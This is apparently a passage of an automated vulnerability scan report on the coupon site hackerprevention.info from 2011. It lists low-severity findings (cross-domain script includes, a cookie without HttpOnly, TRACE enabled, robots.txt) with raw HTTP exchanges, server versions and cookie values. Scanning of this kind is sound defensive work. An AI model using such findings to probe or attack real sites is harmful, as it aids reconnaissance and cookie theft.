Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=b372a979e28f0327fac2823be75e0bf1.1313979311; expires=Mon, 22-Aug-2011 02:45:11 GMT; path=/
Set-Cookie: s123user=b372a979e28f0327fac2823be75e0bf1.1313979311; expires=Mon, 22-Aug-2011 02:45:11 GMT; path=/
Set-Cookie: s123user=b372a979e28f0327fac2823be75e0bf1.1313979311; expires=Mon, 22-Aug-2011 02:45:11 GMT; path=/
Content-Length: 181532
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>alibris -- hackerpreventio
...[SNIP]...
<a href="/Soap-And-Other-Detergents">Soap And Other Detergents</a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 5 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://hackerprevention.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 01:50:06 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184327
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...
<link rel="stylesheet" href="http://cdn.gtln.us/dcws/js/tipsy/tipsy.css" type="text/css" />

<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/jquery.jcarousel.min.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/facebox/facebox.js"></script>
<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/js.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4c24d6a31029b422"></script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">{ "parsetags": "explicit" }</script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/tipsy/jquery.tipsy.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/zc/zc.js"></script>
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="content-inner">
<script type="text/javascript"
src="http://maps.google.com/maps/api/js?sensor=true">

</script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d0542042a57cd8f"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

4.2. http://hackerprevention.info/~coupon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /~coupon/ HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 01:50:18 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184328
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...
<link rel="stylesheet" href="http://cdn.gtln.us/dcws/js/tipsy/tipsy.css" type="text/css" />

<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/jquery.jcarousel.min.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/facebox/facebox.js"></script>
<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/js.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4c24d6a31029b422"></script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">{ "parsetags": "explicit" }</script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/tipsy/jquery.tipsy.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/zc/zc.js"></script>
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="content-inner">
<script type="text/javascript"
src="http://maps.google.com/maps/api/js?sensor=true">

</script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d0542042a57cd8f"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

4.3. http://hackerprevention.info/~coupon/coupons.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/coupons.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /~coupon/coupons.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 01:50:41 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 93148
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Coupons by Stor
...[SNIP]...
<link rel="stylesheet" href="http://cdn.gtln.us/dcws/js/tipsy/tipsy.css" type="text/css" />

<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/jquery.jcarousel.min.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/facebox/facebox.js"></script>
<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/js.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4c24d6a31029b422"></script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">{ "parsetags": "explicit" }</script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/tipsy/jquery.tipsy.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/zc/zc.js"></script>
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

4.4. http://hackerprevention.info/~coupon/coupons/alibris.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/coupons/alibris.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /~coupon/coupons/alibris.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/~coupon/coupons.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.2.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 01:50:52 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 79345
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>alibris</title>
...[SNIP]...
<link rel="stylesheet" href="http://cdn.gtln.us/dcws/js/tipsy/tipsy.css" type="text/css" />

<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/jquery.jcarousel.min.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/facebox/facebox.js"></script>
<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/js.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4c24d6a31029b422"></script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">{ "parsetags": "explicit" }</script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/tipsy/jquery.tipsy.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/zc/zc.js"></script>
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

4.5. http://hackerprevention.info/~coupon/deal_pictures/0  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/deal_pictures/0

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /~coupon/deal_pictures/0 HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 01:50:17 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184314
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...
<link rel="stylesheet" href="http://cdn.gtln.us/dcws/js/tipsy/tipsy.css" type="text/css" />

<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/jquery.jcarousel.min.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/facebox/facebox.js"></script>
<script type="text/javascript" src="http://www.dugoohoo.com/couponsearch/templates/parking/js/js.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4c24d6a31029b422"></script>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">{ "parsetags": "explicit" }</script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/tipsy/jquery.tipsy.js"></script>
<script type="text/javascript" src="http://cdn.gtln.us/dcws/js/zc/zc.js"></script>
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div id="content-inner">
<script type="text/javascript"
src="http://maps.google.com/maps/api/js?sensor=true">

</script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4d0542042a57cd8f"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: hackerprevention.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/37

Response

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 13:25:25 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Set-Cookie: s=658983a72da97a2230cbaa28182cf707; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184976
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...

6. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: hackerprevention.info
Cookie: 5d61d41371cf1d93

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 01:50:06 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hackerprevention.info
Cookie: 5d61d41371cf1d93; s=8ab01134a08f4dbcfde148380a9483ae


7. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: hackerprevention.info

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 01:50:07 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Last-Modified: Wed, 27 Jul 2011 09:22:58 GMT
ETag: "790004-24c-4a9099812a080"
Accept-Ranges: bytes
Content-Length: 588
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-Agent: sogou spider
Disallow: /

User-Agent: Yandex
Disallow: /

User-Agent: Bender
Disallow: /

User-Agent: *
Disallow: /cache/
Disallow: /cgi-bin/
Disallow: /client_src/
Disallow: /config/
Disa
...[SNIP]...

Report generated by XSS.CX at Mon Aug 22 07:29:17 GMT-06:00 2011.